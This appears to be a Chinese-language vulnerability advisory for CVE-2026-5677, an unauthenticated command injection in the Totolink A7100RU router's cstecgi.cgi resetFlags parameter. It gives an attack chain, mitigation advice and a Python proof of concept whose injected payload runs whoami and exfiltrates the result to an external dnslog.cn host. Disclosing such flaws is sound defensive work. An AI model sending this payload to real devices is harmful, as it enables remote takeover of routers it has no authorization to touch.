CVE-2026-5677 CVSS 7.3 高危

CVE-2026-5677 Totolink A7100RU OS命令注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5677

漏洞类型

OS命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A7100RU

漏洞概述

Totolink A7100RU路由器在版本7.4cu.2313_b20191024中存在安全漏洞。漏洞源于/cgi-bin/cstecgi.cgi文件中CsteSystem函数对resetFlags参数处理不当，导致OS命令注入。攻击者无需认证即可远程发起攻击，通过构造恶意参数在系统后台执行任意命令，进而控制设备，造成机密性、完整性和可用性受损。

技术细节

该漏洞的根本原因在于Totolink A7100RU设备固件中的CGI接口存在输入验证缺失。具体而言，`/cgi-bin/cstecgi.cgi`脚本处理`CsteSystem`功能模块请求时，直接接收用户提交的`resetFlags`参数，并将其未经任何安全过滤或转义就拼接到系统命令字符串中，随后调用系统函数（如`system()`）执行。攻击者利用这一缺陷，可以通过发送包含Shell元字符（如`;`、`&`、`|`或反引号）的POST数据包，截断原有命令逻辑并注入恶意指令。由于CVSS向量显示无需权限（PR:N）且无需用户交互（UI:N），攻击者只需知道目标IP即可发起攻击。成功利用后，攻击者可获得底层Shell权限，读取敏感配置、篡改系统设置或植入恶意软件，严重威胁设备安全。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Totolink A7100RU设备及其Web服务接口。

STEP 2

构造请求

攻击者构造恶意的HTTP POST请求，目标指向/cgi-bin/cstecgi.cgi，并在resetFlags参数中注入操作系统命令。

STEP 3

漏洞利用

受害设备接收到请求后，CGI脚本直接将参数传递给系统shell执行，导致注入的恶意命令在设备上运行。

STEP 4

建立控制

攻击者通过执行的命令获取设备权限，可能反弹Shell或下载恶意载荷，从而完全控制路由器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    # Payload to inject a command (e.g., ping a test server)
    # The injected command is appended using a semicolon
    payload = "; ping -c 3 `whoami`.dnslog.cn"
    
    data = {
        "function": "set",
        "resetFlags": payload
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        print(f"[*] Request sent to {url}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施

在未升级固件前，建议用户立即禁用路由器的远程Web管理功能，仅通过局域网访问管理界面，并检查设备日志是否存在异常的CGI请求记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5677
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5677
3 Details https://www.cvedetails.com/cve/CVE-2026-5677/
4 VulDB https://vuldb.com/cve/CVE-2026-5677
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_184/README.md
6 Link https://vuldb.com/submit/792606
7 Link https://vuldb.com/vuln/355504
8 Link https://vuldb.com/vuln/355504/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表